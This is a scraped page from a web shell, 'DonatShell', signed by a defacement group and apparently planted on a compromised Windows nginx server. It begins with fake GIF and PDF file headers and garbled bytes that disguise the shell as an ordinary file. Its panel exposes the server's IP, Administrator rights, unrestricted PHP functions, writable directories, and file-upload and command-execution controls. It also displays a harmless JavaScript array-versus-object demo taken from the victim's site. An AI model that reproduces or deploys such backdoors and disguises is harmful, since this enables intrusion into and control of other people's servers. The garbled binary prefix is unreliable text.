GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/site/_work/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/site/_work//js array or object.html
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>js array or object</title>
</head>

<body>
	
	<script>
	jArray = [];
		jArray[1]="ooga";
		jArray[2001]="booga";
	jObject = {};
		jObject[1]="ooga";
		jObject[2001]="booga";
	console.log('jArray.length='+jArray.length);
		
Object.size = function(obj) {
    var size = 0, key;
    for (key in obj) {
        if (obj.hasOwnProperty(key)) size++;
    }
    return size;
};
		
		
	console.log('Object.size(jObject)='+Object.size(jObject));
	</script>
</body>
</html>

Anon7 - 2022
AnonSec Team